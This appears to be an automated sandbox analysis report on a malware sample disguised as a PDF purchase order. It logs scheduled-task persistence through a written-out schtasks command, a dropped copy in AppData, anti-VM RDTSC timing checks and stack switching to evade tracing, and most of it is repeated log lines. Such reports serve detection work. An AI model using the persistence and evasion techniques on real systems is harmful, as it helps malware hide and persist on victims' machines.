Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp"

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F7DD0 StartServiceCtrlDispatcherW,GetLastError,

11_2_003F7DD0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EqtGqZpPskFq.exe PID: 8076, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
